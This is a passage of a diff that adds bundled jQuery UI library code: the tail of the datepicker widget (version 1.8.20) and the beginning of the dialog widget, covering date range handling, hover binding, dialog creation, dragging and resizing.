+
for (; year <= endYear; year++) {
|
8625 |
+
inst.yearshtml += '<option value="' + year + '"' +
|
8626 |
+
(year == drawYear ? ' selected="selected"' : '') +
|
8627 |
+
'>' + year + '</option>';
|
8628 |
+
}
|
8629 |
+
inst.yearshtml += '</select>';
|
8630 |
+
|
8631 |
+
html += inst.yearshtml;
|
8632 |
+
inst.yearshtml = null;
|
8633 |
+
}
|
8634 |
+
}
|
8635 |
+
html += this._get(inst, 'yearSuffix');
|
8636 |
+
if (showMonthAfterYear)
|
8637 |
+
html += (secondary || !(changeMonth && changeYear) ? ' ' : '') + monthHtml;
|
8638 |
+
html += '</div>'; // Close datepicker_header
|
8639 |
+
return html;
|
8640 |
+
},
|
8641 |
+
|
8642 |
+
/* Adjust one of the date sub-fields. */
|
8643 |
+
_adjustInstDate: function(inst, offset, period) {
|
8644 |
+
var year = inst.drawYear + (period == 'Y' ? offset : 0);
|
8645 |
+
var month = inst.drawMonth + (period == 'M' ? offset : 0);
|
8646 |
+
var day = Math.min(inst.selectedDay, this._getDaysInMonth(year, month)) +
|
8647 |
+
(period == 'D' ? offset : 0);
|
8648 |
+
var date = this._restrictMinMax(inst,
|
8649 |
+
this._daylightSavingAdjust(new Date(year, month, day)));
|
8650 |
+
inst.selectedDay = date.getDate();
|
8651 |
+
inst.drawMonth = inst.selectedMonth = date.getMonth();
|
8652 |
+
inst.drawYear = inst.selectedYear = date.getFullYear();
|
8653 |
+
if (period == 'M' || period == 'Y')
|
8654 |
+
this._notifyChange(inst);
|
8655 |
+
},
|
8656 |
+
|
8657 |
+
/* Ensure a date is within any min/max bounds. */
|
8658 |
+
_restrictMinMax: function(inst, date) {
|
8659 |
+
var minDate = this._getMinMaxDate(inst, 'min');
|
8660 |
+
var maxDate = this._getMinMaxDate(inst, 'max');
|
8661 |
+
var newDate = (minDate && date < minDate ? minDate : date);
|
8662 |
+
newDate = (maxDate && newDate > maxDate ? maxDate : newDate);
|
8663 |
+
return newDate;
|
8664 |
+
},
|
8665 |
+
|
8666 |
+
/* Notify change of month/year. */
|
8667 |
+
_notifyChange: function(inst) {
|
8668 |
+
var onChange = this._get(inst, 'onChangeMonthYear');
|
8669 |
+
if (onChange)
|
8670 |
+
onChange.apply((inst.input ? inst.input[0] : null),
|
8671 |
+
[inst.selectedYear, inst.selectedMonth + 1, inst]);
|
8672 |
+
},
|
8673 |
+
|
8674 |
+
/* Determine the number of months to show. */
|
8675 |
+
_getNumberOfMonths: function(inst) {
|
8676 |
+
var numMonths = this._get(inst, 'numberOfMonths');
|
8677 |
+
return (numMonths == null ? [1, 1] : (typeof numMonths == 'number' ? [1, numMonths] : numMonths));
|
8678 |
+
},
|
8679 |
+
|
8680 |
+
/* Determine the current maximum date - ensure no time components are set. */
|
8681 |
+
_getMinMaxDate: function(inst, minMax) {
|
8682 |
+
return this._determineDate(inst, this._get(inst, minMax + 'Date'), null);
|
8683 |
+
},
|
8684 |
+
|
8685 |
+
/* Find the number of days in a given month. */
|
8686 |
+
_getDaysInMonth: function(year, month) {
|
8687 |
+
return 32 - this._daylightSavingAdjust(new Date(year, month, 32)).getDate();
|
8688 |
+
},
|
8689 |
+
|
8690 |
+
/* Find the day of the week of the first of a month. */
|
8691 |
+
_getFirstDayOfMonth: function(year, month) {
|
8692 |
+
return new Date(year, month, 1).getDay();
|
8693 |
+
},
|
8694 |
+
|
8695 |
+
/* Determines if we should allow a "next/prev" month display change. */
|
8696 |
+
_canAdjustMonth: function(inst, offset, curYear, curMonth) {
|
8697 |
+
var numMonths = this._getNumberOfMonths(inst);
|
8698 |
+
var date = this._daylightSavingAdjust(new Date(curYear,
|
8699 |
+
curMonth + (offset < 0 ? offset : numMonths[0] * numMonths[1]), 1));
|
8700 |
+
if (offset < 0)
|
8701 |
+
date.setDate(this._getDaysInMonth(date.getFullYear(), date.getMonth()));
|
8702 |
+
return this._isInRange(inst, date);
|
8703 |
+
},
|
8704 |
+
|
8705 |
+
/* Is the given date in the accepted range? */
|
8706 |
+
_isInRange: function(inst, date) {
|
8707 |
+
var minDate = this._getMinMaxDate(inst, 'min');
|
8708 |
+
var maxDate = this._getMinMaxDate(inst, 'max');
|
8709 |
+
return ((!minDate || date.getTime() >= minDate.getTime()) &&
|
8710 |
+
(!maxDate || date.getTime() <= maxDate.getTime()));
|
8711 |
+
},
|
8712 |
+
|
8713 |
+
/* Provide the configuration settings for formatting/parsing. */
|
8714 |
+
_getFormatConfig: function(inst) {
|
8715 |
+
var shortYearCutoff = this._get(inst, 'shortYearCutoff');
|
8716 |
+
shortYearCutoff = (typeof shortYearCutoff != 'string' ? shortYearCutoff :
|
8717 |
+
new Date().getFullYear() % 100 + parseInt(shortYearCutoff, 10));
|
8718 |
+
return {shortYearCutoff: shortYearCutoff,
|
8719 |
+
dayNamesShort: this._get(inst, 'dayNamesShort'), dayNames: this._get(inst, 'dayNames'),
|
8720 |
+
monthNamesShort: this._get(inst, 'monthNamesShort'), monthNames: this._get(inst, 'monthNames')};
|
8721 |
+
},
|
8722 |
+
|
8723 |
+
/* Format the given date for display. */
|
8724 |
+
_formatDate: function(inst, day, month, year) {
|
8725 |
+
if (!day) {
|
8726 |
+
inst.currentDay = inst.selectedDay;
|
8727 |
+
inst.currentMonth = inst.selectedMonth;
|
8728 |
+
inst.currentYear = inst.selectedYear;
|
8729 |
+
}
|
8730 |
+
var date = (day ? (typeof day == 'object' ? day :
|
8731 |
+
this._daylightSavingAdjust(new Date(year, month, day))) :
|
8732 |
+
this._daylightSavingAdjust(new Date(inst.currentYear, inst.currentMonth, inst.currentDay)));
|
8733 |
+
return this.formatDate(this._get(inst, 'dateFormat'), date, this._getFormatConfig(inst));
|
8734 |
+
}
|
8735 |
+
});
|
8736 |
+
|
8737 |
+
/*
|
8738 |
+
* Bind hover events for datepicker elements.
|
8739 |
+
* Done via delegate so the binding only occurs once in the lifetime of the parent div.
|
8740 |
+
* Global instActive, set by _updateDatepicker allows the handlers to find their way back to the active picker.
|
8741 |
+
*/
|
8742 |
+
function bindHover(dpDiv) {
|
8743 |
+
var selector = 'button, .ui-datepicker-prev, .ui-datepicker-next, .ui-datepicker-calendar td a';
|
8744 |
+
return dpDiv.bind('mouseout', function(event) {
|
8745 |
+
var elem = $( event.target ).closest( selector );
|
8746 |
+
if ( !elem.length ) {
|
8747 |
+
return;
|
8748 |
+
}
|
8749 |
+
elem.removeClass( "ui-state-hover ui-datepicker-prev-hover ui-datepicker-next-hover" );
|
8750 |
+
})
|
8751 |
+
.bind('mouseover', function(event) {
|
8752 |
+
var elem = $( event.target ).closest( selector );
|
8753 |
+
if ($.datepicker._isDisabledDatepicker( instActive.inline ? dpDiv.parent()[0] : instActive.input[0]) ||
|
8754 |
+
!elem.length ) {
|
8755 |
+
return;
|
8756 |
+
}
|
8757 |
+
elem.parents('.ui-datepicker-calendar').find('a').removeClass('ui-state-hover');
|
8758 |
+
elem.addClass('ui-state-hover');
|
8759 |
+
if (elem.hasClass('ui-datepicker-prev')) elem.addClass('ui-datepicker-prev-hover');
|
8760 |
+
if (elem.hasClass('ui-datepicker-next')) elem.addClass('ui-datepicker-next-hover');
|
8761 |
+
});
|
8762 |
+
}
|
8763 |
+
|
8764 |
+
/* jQuery extend now ignores nulls! */
|
8765 |
+
function extendRemove(target, props) {
|
8766 |
+
$.extend(target, props);
|
8767 |
+
for (var name in props)
|
8768 |
+
if (props[name] == null || props[name] == undefined)
|
8769 |
+
target[name] = props[name];
|
8770 |
+
return target;
|
8771 |
+
};
|
8772 |
+
|
8773 |
+
/* Determine whether an object is an array. */
|
8774 |
+
function isArray(a) {
|
8775 |
+
return (a && (($.browser.safari && typeof a == 'object' && a.length) ||
|
8776 |
+
(a.constructor && a.constructor.toString().match(/\Array\(\)/))));
|
8777 |
+
};
|
8778 |
+
|
8779 |
+
/* Invoke the datepicker functionality.
|
8780 |
+
@param options string - a command, optionally followed by additional parameters or
|
8781 |
+
Object - settings for attaching new datepicker functionality
|
8782 |
+
@return jQuery object */
|
8783 |
+
$.fn.datepicker = function(options){
|
8784 |
+
|
8785 |
+
/* Verify an empty collection wasn't passed - Fixes #6976 */
|
8786 |
+
if ( !this.length ) {
|
8787 |
+
return this;
|
8788 |
+
}
|
8789 |
+
|
8790 |
+
/* Initialise the date picker. */
|
8791 |
+
if (!$.datepicker.initialized) {
|
8792 |
+
$(document).mousedown($.datepicker._checkExternalClick).
|
8793 |
+
find('body').append($.datepicker.dpDiv);
|
8794 |
+
$.datepicker.initialized = true;
|
8795 |
+
}
|
8796 |
+
|
8797 |
+
var otherArgs = Array.prototype.slice.call(arguments, 1);
|
8798 |
+
if (typeof options == 'string' && (options == 'isDisabled' || options == 'getDate' || options == 'widget'))
|
8799 |
+
return $.datepicker['_' + options + 'Datepicker'].
|
8800 |
+
apply($.datepicker, [this[0]].concat(otherArgs));
|
8801 |
+
if (options == 'option' && arguments.length == 2 && typeof arguments[1] == 'string')
|
8802 |
+
return $.datepicker['_' + options + 'Datepicker'].
|
8803 |
+
apply($.datepicker, [this[0]].concat(otherArgs));
|
8804 |
+
return this.each(function() {
|
8805 |
+
typeof options == 'string' ?
|
8806 |
+
$.datepicker['_' + options + 'Datepicker'].
|
8807 |
+
apply($.datepicker, [this].concat(otherArgs)) :
|
8808 |
+
$.datepicker._attachDatepicker(this, options);
|
8809 |
+
});
|
8810 |
+
};
|
8811 |
+
|
8812 |
+
$.datepicker = new Datepicker(); // singleton instance
|
8813 |
+
$.datepicker.initialized = false;
|
8814 |
+
$.datepicker.uuid = new Date().getTime();
|
8815 |
+
$.datepicker.version = "1.8.20";
|
8816 |
+
|
8817 |
+
// Workaround for #4055
|
8818 |
+
// Add another global to avoid noConflict issues with inline event handlers
|
8819 |
+
window['DP_jQuery_' + dpuuid] = $;
|
8820 |
+
|
8821 |
+
})(asljQuery);
|
8822 |
+
|
8823 |
+
(function( $, undefined ) {
|
8824 |
+
|
8825 |
+
var uiDialogClasses =
|
8826 |
+
'ui-dialog ' +
|
8827 |
+
'ui-widget ' +
|
8828 |
+
'ui-widget-content ' +
|
8829 |
+
'ui-corner-all ',
|
8830 |
+
sizeRelatedOptions = {
|
8831 |
+
buttons: true,
|
8832 |
+
height: true,
|
8833 |
+
maxHeight: true,
|
8834 |
+
maxWidth: true,
|
8835 |
+
minHeight: true,
|
8836 |
+
minWidth: true,
|
8837 |
+
width: true
|
8838 |
+
},
|
8839 |
+
resizableRelatedOptions = {
|
8840 |
+
maxHeight: true,
|
8841 |
+
maxWidth: true,
|
8842 |
+
minHeight: true,
|
8843 |
+
minWidth: true
|
8844 |
+
},
|
8845 |
+
// support for jQuery 1.3.2 - handle common attrFn methods for dialog
|
8846 |
+
attrFn = $.attrFn || {
|
8847 |
+
val: true,
|
8848 |
+
css: true,
|
8849 |
+
html: true,
|
8850 |
+
text: true,
|
8851 |
+
data: true,
|
8852 |
+
width: true,
|
8853 |
+
height: true,
|
8854 |
+
offset: true,
|
8855 |
+
click: true
|
8856 |
+
};
|
8857 |
+
|
8858 |
+
$.widget("ui.dialog", {
|
8859 |
+
options: {
|
8860 |
+
autoOpen: true,
|
8861 |
+
buttons: {},
|
8862 |
+
closeOnEscape: true,
|
8863 |
+
closeText: 'close',
|
8864 |
+
dialogClass: '',
|
8865 |
+
draggable: true,
|
8866 |
+
hide: null,
|
8867 |
+
height: 'auto',
|
8868 |
+
maxHeight: false,
|
8869 |
+
maxWidth: false,
|
8870 |
+
minHeight: 150,
|
8871 |
+
minWidth: 150,
|
8872 |
+
modal: false,
|
8873 |
+
position: {
|
8874 |
+
my: 'center',
|
8875 |
+
at: 'center',
|
8876 |
+
collision: 'fit',
|
8877 |
+
// ensure that the titlebar is never outside the document
|
8878 |
+
using: function(pos) {
|
8879 |
+
var topOffset = $(this).css(pos).offset().top;
|
8880 |
+
if (topOffset < 0) {
|
8881 |
+
$(this).css('top', pos.top - topOffset);
|
8882 |
+
}
|
8883 |
+
}
|
8884 |
+
},
|
8885 |
+
resizable: true,
|
8886 |
+
show: null,
|
8887 |
+
stack: true,
|
8888 |
+
title: '',
|
8889 |
+
width: 300,
|
8890 |
+
zIndex: 1000
|
8891 |
+
},
|
8892 |
+
|
8893 |
+
_create: function() {
|
8894 |
+
this.originalTitle = this.element.attr('title');
|
8895 |
+
// #5742 - .attr() might return a DOMElement
|
8896 |
+
if ( typeof this.originalTitle !== "string" ) {
|
8897 |
+
this.originalTitle = "";
|
8898 |
+
}
|
8899 |
+
|
8900 |
+
this.options.title = this.options.title || this.originalTitle;
|
8901 |
+
var self = this,
|
8902 |
+
options = self.options,
|
8903 |
+
|
8904 |
+
title = options.title || ' ',
|
8905 |
+
titleId = $.ui.dialog.getTitleId(self.element),
|
8906 |
+
|
8907 |
+
uiDialog = (self.uiDialog = $('<div></div>'))
|
8908 |
+
.appendTo(document.body)
|
8909 |
+
.hide()
|
8910 |
+
.addClass(uiDialogClasses + options.dialogClass)
|
8911 |
+
.css({
|
8912 |
+
zIndex: options.zIndex
|
8913 |
+
})
|
8914 |
+
// setting tabIndex makes the div focusable
|
8915 |
+
// setting outline to 0 prevents a border on focus in Mozilla
|
8916 |
+
.attr('tabIndex', -1).css('outline', 0).keydown(function(event) {
|
8917 |
+
if (options.closeOnEscape && !event.isDefaultPrevented() && event.keyCode &&
|
8918 |
+
event.keyCode === $.ui.keyCode.ESCAPE) {
|
8919 |
+
|
8920 |
+
self.close(event);
|
8921 |
+
event.preventDefault();
|
8922 |
+
}
|
8923 |
+
})
|
8924 |
+
.attr({
|
8925 |
+
role: 'dialog',
|
8926 |
+
'aria-labelledby': titleId
|
8927 |
+
})
|
8928 |
+
.mousedown(function(event) {
|
8929 |
+
self.moveToTop(false, event);
|
8930 |
+
}),
|
8931 |
+
|
8932 |
+
uiDialogContent = self.element
|
8933 |
+
.show()
|
8934 |
+
.removeAttr('title')
|
8935 |
+
.addClass(
|
8936 |
+
'ui-dialog-content ' +
|
8937 |
+
'ui-widget-content')
|
8938 |
+
.appendTo(uiDialog),
|
8939 |
+
|
8940 |
+
uiDialogTitlebar = (self.uiDialogTitlebar = $('<div></div>'))
|
8941 |
+
.addClass(
|
8942 |
+
'ui-dialog-titlebar ' +
|
8943 |
+
'ui-widget-header ' +
|
8944 |
+
'ui-corner-all ' +
|
8945 |
+
'ui-helper-clearfix'
|
8946 |
+
)
|
8947 |
+
.prependTo(uiDialog),
|
8948 |
+
|
8949 |
+
uiDialogTitlebarClose = $('<a href="#"></a>')
|
8950 |
+
.addClass(
|
8951 |
+
'ui-dialog-titlebar-close ' +
|
8952 |
+
'ui-corner-all'
|
8953 |
+
)
|
8954 |
+
.attr('role', 'button')
|
8955 |
+
.hover(
|
8956 |
+
function() {
|
8957 |
+
uiDialogTitlebarClose.addClass('ui-state-hover');
|
8958 |
+
},
|
8959 |
+
function() {
|
8960 |
+
uiDialogTitlebarClose.removeClass('ui-state-hover');
|
8961 |
+
}
|
8962 |
+
)
|
8963 |
+
.focus(function() {
|
8964 |
+
uiDialogTitlebarClose.addClass('ui-state-focus');
|
8965 |
+
})
|
8966 |
+
.blur(function() {
|
8967 |
+
uiDialogTitlebarClose.removeClass('ui-state-focus');
|
8968 |
+
})
|
8969 |
+
.click(function(event) {
|
8970 |
+
self.close(event);
|
8971 |
+
return false;
|
8972 |
+
})
|
8973 |
+
.appendTo(uiDialogTitlebar),
|
8974 |
+
|
8975 |
+
uiDialogTitlebarCloseText = (self.uiDialogTitlebarCloseText = $('<span></span>'))
|
8976 |
+
.addClass(
|
8977 |
+
'ui-icon ' +
|
8978 |
+
'ui-icon-closethick'
|
8979 |
+
)
|
8980 |
+
.text(options.closeText)
|
8981 |
+
.appendTo(uiDialogTitlebarClose),
|
8982 |
+
|
8983 |
+
uiDialogTitle = $('<span></span>')
|
8984 |
+
.addClass('ui-dialog-title')
|
8985 |
+
.attr('id', titleId)
|
8986 |
+
.html(title)
|
8987 |
+
.prependTo(uiDialogTitlebar);
|
8988 |
+
|
8989 |
+
//handling of deprecated beforeclose (vs beforeClose) option
|
8990 |
+
//Ticket #4669 http://dev.jqueryui.com/ticket/4669
|
8991 |
+
//TODO: remove in 1.9pre
|
8992 |
+
if ($.isFunction(options.beforeclose) && !$.isFunction(options.beforeClose)) {
|
8993 |
+
options.beforeClose = options.beforeclose;
|
8994 |
+
}
|
8995 |
+
|
8996 |
+
uiDialogTitlebar.find("*").add(uiDialogTitlebar).disableSelection();
|
8997 |
+
|
8998 |
+
if (options.draggable && $.fn.draggable) {
|
8999 |
+
self._makeDraggable();
|
9000 |
+
}
|
9001 |
+
if (options.resizable && $.fn.resizable) {
|
9002 |
+
self._makeResizable();
|
9003 |
+
}
|
9004 |
+
|
9005 |
+
self._createButtons(options.buttons);
|
9006 |
+
self._isOpen = false;
|
9007 |
+
|
9008 |
+
if ($.fn.bgiframe) {
|
9009 |
+
uiDialog.bgiframe();
|
9010 |
+
}
|
9011 |
+
},
|
9012 |
+
|
9013 |
+
_init: function() {
|
9014 |
+
if ( this.options.autoOpen ) {
|
9015 |
+
this.open();
|
9016 |
+
}
|
9017 |
+
},
|
9018 |
+
|
9019 |
+
destroy: function() {
|
9020 |
+
var self = this;
|
9021 |
+
|
9022 |
+
if (self.overlay) {
|
9023 |
+
self.overlay.destroy();
|
9024 |
+
}
|
9025 |
+
self.uiDialog.hide();
|
9026 |
+
self.element
|
9027 |
+
.unbind('.dialog')
|
9028 |
+
.removeData('dialog')
|
9029 |
+
.removeClass('ui-dialog-content ui-widget-content')
|
9030 |
+
.hide().appendTo('body');
|
9031 |
+
self.uiDialog.remove();
|
9032 |
+
|
9033 |
+
if (self.originalTitle) {
|
9034 |
+
self.element.attr('title', self.originalTitle);
|
9035 |
+
}
|
9036 |
+
|
9037 |
+
return self;
|
9038 |
+
},
|
9039 |
+
|
9040 |
+
widget: function() {
|
9041 |
+
return this.uiDialog;
|
9042 |
+
},
|
9043 |
+
|
9044 |
+
close: function(event) {
|
9045 |
+
var self = this,
|
9046 |
+
maxZ, thisZ;
|
9047 |
+
|
9048 |
+
if (false === self._trigger('beforeClose', event)) {
|
9049 |
+
return;
|
9050 |
+
}
|
9051 |
+
|
9052 |
+
if (self.overlay) {
|
9053 |
+
self.overlay.destroy();
|
9054 |
+
}
|
9055 |
+
self.uiDialog.unbind('keypress.ui-dialog');
|
9056 |
+
|
9057 |
+
self._isOpen = false;
|
9058 |
+
|
9059 |
+
if (self.options.hide) {
|
9060 |
+
self.uiDialog.hide(self.options.hide, function() {
|
9061 |
+
self._trigger('close', event);
|
9062 |
+
});
|
9063 |
+
} else {
|
9064 |
+
self.uiDialog.hide();
|
9065 |
+
self._trigger('close', event);
|
9066 |
+
}
|
9067 |
+
|
9068 |
+
$.ui.dialog.overlay.resize();
|
9069 |
+
|
9070 |
+
// adjust the maxZ to allow other modal dialogs to continue to work (see #4309)
|
9071 |
+
if (self.options.modal) {
|
9072 |
+
maxZ = 0;
|
9073 |
+
$('.ui-dialog').each(function() {
|
9074 |
+
if (this !== self.uiDialog[0]) {
|
9075 |
+
thisZ = $(this).css('z-index');
|
9076 |
+
if(!isNaN(thisZ)) {
|
9077 |
+
maxZ = Math.max(maxZ, thisZ);
|
9078 |
+
}
|
9079 |
+
}
|
9080 |
+
});
|
9081 |
+
$.ui.dialog.maxZ = maxZ;
|
9082 |
+
}
|
9083 |
+
|
9084 |
+
return self;
|
9085 |
+
},
|
9086 |
+
|
9087 |
+
isOpen: function() {
|
9088 |
+
return this._isOpen;
|
9089 |
+
},
|
9090 |
+
|
9091 |
+
// the force parameter allows us to move modal dialogs to their correct
|
9092 |
+
// position on open
|
9093 |
+
moveToTop: function(force, event) {
|
9094 |
+
var self = this,
|
9095 |
+
options = self.options,
|
9096 |
+
saveScroll;
|
9097 |
+
|
9098 |
+
if ((options.modal && !force) ||
|
9099 |
+
(!options.stack && !options.modal)) {
|
9100 |
+
return self._trigger('focus', event);
|
9101 |
+
}
|
9102 |
+
|
9103 |
+
if (options.zIndex > $.ui.dialog.maxZ) {
|
9104 |
+
$.ui.dialog.maxZ = options.zIndex;
|
9105 |
+
}
|
9106 |
+
if (self.overlay) {
|
9107 |
+
$.ui.dialog.maxZ += 1;
|
9108 |
+
self.overlay.$el.css('z-index', $.ui.dialog.overlay.maxZ = $.ui.dialog.maxZ);
|
9109 |
+
}
|
9110 |
+
|
9111 |
+
//Save and then restore scroll since Opera 9.5+ resets when parent z-Index is changed.
|
9112 |
+
// http://ui.jquery.com/bugs/ticket/3193
|
9113 |
+
saveScroll = { scrollTop: self.element.scrollTop(), scrollLeft: self.element.scrollLeft() };
|
9114 |
+
$.ui.dialog.maxZ += 1;
|
9115 |
+
self.uiDialog.css('z-index', $.ui.dialog.maxZ);
|
9116 |
+
self.element.attr(saveScroll);
|
9117 |
+
self._trigger('focus', event);
|
9118 |
+
|
9119 |
+
return self;
|
9120 |
+
},
|
9121 |
+
|
9122 |
+
open: function() {
|
9123 |
+
if (this._isOpen) { return; }
|
9124 |
+
|
9125 |
+
var self = this,
|
9126 |
+
options = self.options,
|
9127 |
+
uiDialog = self.uiDialog;
|
9128 |
+
|
9129 |
+
self.overlay = options.modal ? new $.ui.dialog.overlay(self) : null;
|
9130 |
+
self._size();
|
9131 |
+
self._position(options.position);
|
9132 |
+
uiDialog.show(options.show);
|
9133 |
+
self.moveToTop(true);
|
9134 |
+
|
9135 |
+
// prevent tabbing out of modal dialogs
|
9136 |
+
if ( options.modal ) {
|
9137 |
+
uiDialog.bind( "keydown.ui-dialog", function( event ) {
|
9138 |
+
if ( event.keyCode !== $.ui.keyCode.TAB ) {
|
9139 |
+
return;
|
9140 |
+
}
|
9141 |
+
|
9142 |
+
var tabbables = $(':tabbable', this),
|
9143 |
+
first = tabbables.filter(':first'),
|
9144 |
+
last = tabbables.filter(':last');
|
9145 |
+
|
9146 |
+
if (event.target === last[0] && !event.shiftKey) {
|
9147 |
+
first.focus(1);
|
9148 |
+
return false;
|
9149 |
+
} else if (event.target === first[0] && event.shiftKey) {
|
9150 |
+
last.focus(1);
|
9151 |
+
return false;
|
9152 |
+
}
|
9153 |
+
});
|
9154 |
+
}
|
9155 |
+
|
9156 |
+
// set focus to the first tabbable element in the content area or the first button
|
9157 |
+
// if there are no tabbable elements, set focus on the dialog itself
|
9158 |
+
$(self.element.find(':tabbable').get().concat(
|
9159 |
+
uiDialog.find('.ui-dialog-buttonpane :tabbable').get().concat(
|
9160 |
+
uiDialog.get()))).eq(0).focus();
|
9161 |
+
|
9162 |
+
self._isOpen = true;
|
9163 |
+
self._trigger('open');
|
9164 |
+
|
9165 |
+
return self;
|
9166 |
+
},
|
9167 |
+
|
9168 |
+
_createButtons: function(buttons) {
|
9169 |
+
var self = this,
|
9170 |
+
hasButtons = false,
|
9171 |
+
uiDialogButtonPane = $('<div></div>')
|
9172 |
+
.addClass(
|
9173 |
+
'ui-dialog-buttonpane ' +
|
9174 |
+
'ui-widget-content ' +
|
9175 |
+
'ui-helper-clearfix'
|
9176 |
+
),
|
9177 |
+
uiButtonSet = $( "<div></div>" )
|
9178 |
+
.addClass( "ui-dialog-buttonset" )
|
9179 |
+
.appendTo( uiDialogButtonPane );
|
9180 |
+
|
9181 |
+
// if we already have a button pane, remove it
|
9182 |
+
self.uiDialog.find('.ui-dialog-buttonpane').remove();
|
9183 |
+
|
9184 |
+
if (typeof buttons === 'object' && buttons !== null) {
|
9185 |
+
$.each(buttons, function() {
|
9186 |
+
return !(hasButtons = true);
|
9187 |
+
});
|
9188 |
+
}
|
9189 |
+
if (hasButtons) {
|
9190 |
+
$.each(buttons, function(name, props) {
|
9191 |
+
props = $.isFunction( props ) ?
|
9192 |
+
{ click: props, text: name } :
|
9193 |
+
props;
|
9194 |
+
var button = $('<button type="button"></button>')
|
9195 |
+
.click(function() {
|
9196 |
+
props.click.apply(self.element[0], arguments);
|
9197 |
+
})
|
9198 |
+
.appendTo(uiButtonSet);
|
9199 |
+
// can't use .attr( props, true ) with jQuery 1.3.2.
|
9200 |
+
$.each( props, function( key, value ) {
|
9201 |
+
if ( key === "click" ) {
|
9202 |
+
return;
|
9203 |
+
}
|
9204 |
+
if ( key in attrFn ) {
|
9205 |
+
button[ key ]( value );
|
9206 |
+
} else {
|
9207 |
+
button.attr( key, value );
|
9208 |
+
}
|
9209 |
+
});
|
9210 |
+
if ($.fn.button) {
|
9211 |
+
button.button();
|
9212 |
+
}
|
9213 |
+
});
|
9214 |
+
uiDialogButtonPane.appendTo(self.uiDialog);
|
9215 |
+
}
|
9216 |
+
},
|
9217 |
+
|
9218 |
+
_makeDraggable: function() {
|
9219 |
+
var self = this,
|
9220 |
+
options = self.options,
|
9221 |
+
doc = $(document),
|
9222 |
+
heightBeforeDrag;
|
9223 |
+
|
9224 |
+
function filteredUi(ui) {
|
9225 |
+
return {
|
9226 |
+
position: ui.position,
|
9227 |
+
offset: ui.offset
|
9228 |
+
};
|
9229 |
+
}
|
9230 |
+
|
9231 |
+
self.uiDialog.draggable({
|
9232 |
+
cancel: '.ui-dialog-content, .ui-dialog-titlebar-close',
|
9233 |
+
handle: '.ui-dialog-titlebar',
|
9234 |
+
containment: 'document',
|
9235 |
+
start: function(event, ui) {
|
9236 |
+
heightBeforeDrag = options.height === "auto" ? "auto" : $(this).height();
|
9237 |
+
$(this).height($(this).height()).addClass("ui-dialog-dragging");
|
9238 |
+
self._trigger('dragStart', event, filteredUi(ui));
|
9239 |
+
},
|
9240 |
+
drag: function(event, ui) {
|
9241 |
+
self._trigger('drag', event, filteredUi(ui));
|
9242 |
+
},
|
9243 |
+
stop: function(event, ui) {
|
9244 |
+
options.position = [ui.position.left - doc.scrollLeft(),
|
9245 |
+
ui.position.top - doc.scrollTop()];
|
9246 |
+
$(this).removeClass("ui-dialog-dragging").height(heightBeforeDrag);
|
9247 |
+
self._trigger('dragStop', event, filteredUi(ui));
|
9248 |
+
$.ui.dialog.overlay.resize();
|
9249 |
+
}
|
9250 |
+
});
|
9251 |
+
},
|
9252 |
+
|
9253 |
+
_makeResizable: function(handles) {
|
9254 |
+
handles = (handles === undefined ? this.options.resizable : handles);
|
9255 |
+
var self = this,
|
9256 |
+
options = self.options,
|
9257 |
+
// .ui-resizable has position: relative defined in the stylesheet
|
9258 |
+
// but dialogs have to use absolute or fixed positioning
|
9259 |
+
position = self.uiDialog.css('position'),
|
9260 |
+
resizeHandles = (typeof handles === 'string' ?
|
9261 |
+
handles :
|
9262 |
+
'n,e,s,w,se,sw,ne,nw'
|
9263 |
+
);
|
9264 |
+
|
9265 |
+
function filteredUi(ui) {
|
9266 |
+
return {
|
9267 |
+
originalPosition: ui.originalPosition,
|
9268 |
+
originalSize: ui.originalSize,
|
9269 |
+
position: ui.position,
|
9270 |
+
size: ui.size
|
9271 |
+
};
|
9272 |
+
}
|
9273 |
+
|
9274 |
+
self.uiDialog.resizable({
|
9275 |
+
cancel: '.ui-dialog-content',
|
9276 |
+
containment: 'document',
|
9277 |
+
alsoResize: self.element,
|
9278 |
+
maxWidth: options.maxWidth,
|
9279 |
+
maxHeight: options.maxHeight,
|
9280 |
+
minWidth: options.minWidth,
|
9281 |
+
minHeight: self._minHeight(),
|
9282 |
+
handles: resizeHandles,
|
9283 |
+
start: function(event, ui) {
|
9284 |
+
$(this).addClass("ui-dialog-resizing");
|
9285 |
+
self._trigger('resizeStart', event, filteredUi(ui));
|
9286 |
+
},
|
9287 |
+
resize: function(event, ui) {
|
9288 |
+
self._trigger('resize', event, filteredUi(ui));
|
9289 |
+
},
|
9290 |
+
stop: function(event, ui) {
|
9291 |
+
$(this).removeClass("ui-dialog-resizing");
|
9292 |
+
options.height = $(this).height();
|
9293 |
+
options.width = $(this).width();
|
9294 |
+
self._trigger('resizeStop', event, filteredUi(ui));
|
9295 |
+
$.ui.dialog.overlay.resize();
|
9296 |
+
}
|
9297 |
+
})
|
9298 |
+
.css('position', position)
|
9299 |
+
.find('.ui-resizable-se').addClass('ui-icon ui-icon-grip-diagonal-se');
|
9300 |
+
},
|
9301 |
+
|
9302 |
+
_minHeight: function() {
|
9303 |
+
var options = this.options;
|
9304 |
+
|
9305 |
+
if (options.height === 'auto') {
|
9306 |
+
return options.minHeight;
|
9307 |
+
} else {
|
9308 |
+
return Math.min(options.minHeight, options.height);
|
9309 |
+
}
|
9310 |
+
},
|
9311 |
+
|
9312 |
+
_position: function(position) {
|
9313 |
+
var myAt = [],
|
9314 |
+
offset = [0, 0],
|
9315 |
+
isVisible;
|
9316 |
+
|
9317 |
+
if (position) {
|
9318 |
+
// deep extending converts arrays to objects in jQuery <= 1.3.2 :-(
|
9319 |
+
// if (typeof position == 'string' || $.isArray(position)) {
|
9320 |
+
// myAt = $.isArray(position) ? position : position.split(' ');
|
9321 |
+
|
9322 |
+
if (typeof position === 'string' || (typeof position === 'object' && '0' in position)) {
|
9323 |
+
myAt = position.split ? position.split(' ') : [position[0], position[1]];
|
9324 |
+
if (myAt.length === 1) {
|
9325 |
+
myAt[1] = myAt[0];
|
9326 |
+
}
|
9327 |
+
|
9328 |
+
$.each(['left', 'top'], function(i, offsetPosition) {
|
9329 |
+
if (+myAt[i] === myAt[i]) {
|
9330 |
+
offset[i] = myAt[i];
|
9331 |
+
myAt[i] = offsetPosition;
|
9332 |
+
}
|
9333 |
+
});
|
9334 |
+
|
9335 |
+
position = {
|
9336 |
+
my: myAt.join(" "),
|
9337 |
+
at: myAt.join(" "),
|
9338 |
+
offset: offset.join(" ")
|
9339 |
+
};
|
9340 |
+
}
|
9341 |
+
|
9342 |
+
position = $.extend({}, $.ui.dialog.prototype.options.position, position);
|
9343 |
+
} else {
|
9344 |
+
position = $.ui.dialog.prototype.options.position;
|
9345 |
+
}
|
9346 |
+
|
